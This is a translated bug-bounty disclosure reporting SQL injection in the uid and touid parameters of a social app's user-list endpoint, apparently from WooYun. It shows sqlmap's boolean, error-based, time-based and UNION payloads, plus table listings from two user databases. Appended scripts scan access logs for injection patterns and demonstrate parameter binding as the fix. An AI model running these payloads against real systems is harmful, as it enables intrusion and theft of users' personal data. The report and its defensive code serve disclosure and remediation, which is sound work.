
App security: multiple SQL injections in 疯点 bundled into one report (affects 200k+ users' information / UNION possible)

2016-07-11 14:35

http://**.**.**.**/index.php/space/getulist?&uid=1800821&sinceuid=1&touid=180082

Every uid and touid parameter is injectable.

I won't list them one by one; I can't stand people who split one bug into several separate submissions.



code area
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: &uid=1800821 OR NOT 7662=7662#&sinceuid=1&touid=180082

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: &uid=1800821 AND (SELECT 1225 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(1225=1225,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sinceuid=1&touid=180082

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: &uid=1800821 AND (SELECT * FROM (SELECT(SLEEP(5)))kfKj)&sinceuid=1&touid=180082

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: &uid=-1520 UNION ALL SELECT CONCAT(0x717a6b6a71,0x45594f4a4a637645695a7051785163597264736c6274486d6a6b794c6e5641697843494f6c4c7948,0x716a707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&sinceuid=1&touid=180082

Parameter: touid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: &uid=1800821&sinceuid=1&touid=180082 OR NOT 5492=5492#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: &uid=1800821&sinceuid=1&touid=180082 AND (SELECT 2428 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(2428=2428,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: &uid=1800821&sinceuid=1&touid=180082 AND (SELECT * FROM (SELECT(SLEEP(5)))SueD)

    Type: UNION query
    Title: Generic UNION query (19) - 9 columns
    Payload: &uid=1800821&sinceuid=1&touid=-5005 UNION ALL SELECT CONCAT(0x717a6b6a71,0x7a656458457249687a745455534d464c626b6c734574475a424653446363746b466350614c727950,0x716a707071),19,19,19,19,19,19,19,19-- -
---
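The four probe families sqlmap reports above (boolean, error-based, time-based, UNION) each leave a recognisable shape in the web server's access log, and for an endpoint whose ids are supposed to be integers the simplest signal is a parameter that is not a plain number. The following script is an added example written for this page, not code from the report or from the application: it parses a few constructed access-log lines (the request shapes are copied from the sqlmap output above and percent-encoded as a client would send them; the IP addresses, timestamps and combined-log layout are assumptions) and flags every id parameter that fails the integer check, labelling which probe family it resembles.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in combined-log shape (not taken from the report).
# The request targets reuse the probe shapes from the sqlmap output, percent-encoded
# the way a client would send them; the client IPs and timestamps are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jul/2016:14:35:01 +0800] "GET /index.php/space/getulist?uid=1800821&sinceuid=1&touid=180082 HTTP/1.1" 200 512
10.0.0.9 - - [11/Jul/2016:14:35:02 +0800] "GET /index.php/space/getulist?uid=1800821%20OR%20NOT%207662%3D7662%23&sinceuid=1&touid=180082 HTTP/1.1" 200 88
10.0.0.9 - - [11/Jul/2016:14:35:03 +0800] "GET /index.php/space/getulist?uid=1800821%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))kfKj)&sinceuid=1&touid=180082 HTTP/1.1" 200 88
10.0.0.9 - - [11/Jul/2016:14:35:09 +0800] "GET /index.php/space/getulist?uid=-1520%20UNION%20ALL%20SELECT%20CONCAT(0x717a6b6a71,0x45,0x716a707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&sinceuid=1&touid=180082 HTTP/1.1" 200 930
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Parameters this endpoint treats as numeric ids (assumed from the URL in the report):
# any non-digit content in them is a finding on its own.
INT_PARAMS = {"uid", "sinceuid", "touid"}

# Probe families, named after the techniques sqlmap listed for this endpoint.
SIGNATURES = {
    "time-based": re.compile(r"\bSLEEP\s*\(", re.I),
    "union-select": re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S),
    "schema-enum": re.compile(r"INFORMATION_SCHEMA", re.I),
    "hex-literal": re.compile(r"0x[0-9a-f]{6,}", re.I),
    "comment-tail": re.compile(r"#|--\s"),
}


def parse_line(line):
    """Split one access-log line into client ip, path and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "path": parts.path, "params": parse_qs(parts.query)}


def analyse(line):
    """Return (ip, parameter, reasons) for every suspicious parameter value on the line."""
    rec = parse_line(line)
    if rec is None:
        return []
    findings = []
    for name, values in rec["params"].items():
        for value in values:
            reasons = []
            if name in INT_PARAMS and not value.isdigit():
                reasons.append("non-integer id")
            for label, rx in SIGNATURES.items():
                if rx.search(value):
                    reasons.append(label)
            if reasons:
                findings.append((rec["ip"], name, reasons))
    return findings


def scan(log_text):
    """Run analyse() over every non-empty line of a log and flatten the findings."""
    return [f for line in log_text.splitlines() if line.strip() for f in analyse(line)]


if __name__ == "__main__":
    for ip, param, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {param}: {', '.join(reasons)}")
```

The integer check fires on every probe, including ones none of the regexes would recognise, which is why a type check on the parameter (here, and better still in the application itself) is a stronger control than a signature list; the signatures only add a label for triage.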



1.png

DBA privileges

2.png

One database has over twenty thousand tables

3.png



code area
Database: aa_base

Is this table the 260k users?

+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| `action`           | 891848  |
| score              | 675673  |
| communication      | 315581  |
| appointment_note   | 308701  |
| user_base          | 268956  |
| user_info          | 268742  |
| user_base_20150301 | 194735  |
| user_point         | 158287  |
| topic_visit        | 109661  |
| user_pic           | 93542   |
| user_bw_list       | 80353   |
| addfriend          | 75739   |
| pushrecord         | 54882   |
| interview          | 47049   |
| user_third         | 30517   |
| android_token      | 26948   |
| user_hot_fix       | 23683   |
| web_user           | 20963   |
| push_msg_his       | 20489   |
| contact            | 18338   |
| game_vote          | 17183   |
| user_avtar_his     | 14715   |
| ios_token          | 11964   |
| user_photo         | 8353    |
| wallet             | 6177    |
| ios_token_copy     | 4691    |
| addfriend1         | 3193    |
| schoolesite        | 2845    |
| label              | 819     |
| wechat_result      | 536     |
| answer             | 414     |
| fx38               | 408     |
| talk_ams           | 306     |
| school_info        | 305     |
| music_yx_ip        | 267     |
| gbox_ams           | 204     |
| game_vote_virtual  | 188     |
| activity           | 183     |
| question           | 176     |
| wechat_game        | 147     |
| memory_log         | 144     |
| appointment        | 93      |
| music_yx           | 88      |
| tmpp               | 83      |
| sp                 | 69      |
| android_token_copy | 68      |
| question_copy      | 63      |
| media_mark         | 46      |
| news               | 17      |
| temp               | 17      |
| adplace            | 15      |
| community          | 15      |
| user_shangjia      | 13      |
| user_dating        | 9       |
| notes              | 8       |
| fun_news           | 6       |
| dsft_list          | 5       |
| label_type         | 4       |
| question_bank      | 4       |
| user_admin         | 4       |
| com_submit         | 3       |
| report             | 3       |
| sms                | 3       |
| scene_ams          | 2       |
| bg_img             | 1       |
| crazy_ams          | 1       |
| game               | 1       |
| user_operator      | 1       |
| userid_count       | 1       |
+--------------------+---------+



Does this count as cross-database access?

code area
Database: aa_topic

+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| affiliate         | 282635  |
| comment_t         | 168895  |
| blog_t            | 89685   |
| attitude_t        | 89521   |
| analyze_x         | 54121   |
| attention         | 49738   |
| uids              | 25812   |
| attitude_t_copy   | 21956   |
| guide             | 5350    |
| blogpagev         | 1453    |
| collect_t_index   | 852     |
| interview         | 687     |
| collect_t         | 553     |
| topic             | 404     |
| topic1            | 360     |
| topic_config      | 350     |
| subordinatedclass | 283     |
| blog_attention    | 106     |
| award_list        | 47      |
| t_blog_tag        | 46      |
| rotate            | 24      |
| chatroom          | 6       |
| shield            | 3       |
+-------------------+---------+



By the way, are there really 7 million users? There were too many tables, so I didn't finish running it.



Proof of vulnerability:


Fix:

By the way, are there really 7 million users? I suggest auditing every parameter; don't just patch whichever one gets pointed out, that is the wrong choice!
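The defect behind every injection point in this report is the same: a GET parameter that should be an integer is pasted into the SQL text, so the parameter becomes an expression the database evaluates. The script below is an added example for this page, not the application's code (its stack is PHP/MySQL; SQLite stands in here so the example runs offline, and the `user_base` rows are invented). It places the defective query beside a hardened one and runs the report's boolean probe against both: the concatenating version returns a different row count for the false and true forms, which is exactly the oracle sqlmap's "boolean-based blind" technique relies on, while the validating and parameter-binding version rejects both. The trailing `#` MySQL comment from the report's payload is dropped because SQLite has no such comment syntax and nothing follows the injected expression here anyway.

```python
import sqlite3

# Constructed stand-in for the app's user table; the rows are invented and only
# the table name user_base is taken from the report's listing.
SAMPLE_USERS = [(1800821, "alice"), (180082, "bob"), (42, "carol")]


def make_db():
    """Build an in-memory SQLite database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_base (uid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO user_base VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_getulist(conn, uid):
    """The defective pattern: the GET parameter is spliced into the SQL text.

    Whatever expression the caller supplies becomes part of the WHERE clause,
    which is what lets sqlmap turn uid into a true/false oracle.
    """
    sql = f"SELECT uid, name FROM user_base WHERE uid = {uid}"
    return conn.execute(sql).fetchall()


def parse_id(value):
    """Accept only a plain decimal integer; anything else is rejected up front."""
    if not isinstance(value, str) or not value.isdigit():
        raise ValueError(f"invalid id: {value!r}")
    return int(value)


def safe_getulist(conn, uid):
    """The hardened pattern: check the type, then bind the value as a parameter.

    Even if the check were skipped, a bound value is data, never SQL text.
    """
    sql = "SELECT uid, name FROM user_base WHERE uid = ?"
    return conn.execute(sql, (parse_id(uid),)).fetchall()


def boolean_oracle_rows(conn, query_fn):
    """Row counts for the report's boolean probe in its false and true forms.

    SQLite, like MySQL, binds NOT more loosely than '=', so 'NOT 7662=7662' is
    NOT (true) and adds nothing, while 'NOT 7662=7663' is NOT (false) and
    matches every row.
    """
    false_probe = "1800821 OR NOT 7662=7662"
    true_probe = "1800821 OR NOT 7662=7663"
    counts = {}
    for label, probe in (("false", false_probe), ("true", true_probe)):
        try:
            counts[label] = len(query_fn(conn, probe))
        except ValueError:
            counts[label] = "rejected"
    return counts


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", boolean_oracle_rows(db, vulnerable_getulist))  # {'false': 1, 'true': 3}
    print("hardened:  ", boolean_oracle_rows(db, safe_getulist))        # {'false': 'rejected', 'true': 'rejected'}
```

Applying the fix the way the report recommends means every id-taking handler goes through `parse_id` and a bound parameter, not just `uid` and `touid` on this one endpoint; the parameter binding alone would already stop the injection, and the type check on top gives a clean error to log instead of a silently empty result.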

By the way, is there a little gift on offer? I keep seeing other people showing off their gifts and I'm dying of envy!

Source: www.wooyun.org/bugs/wooyun-2016-0211863
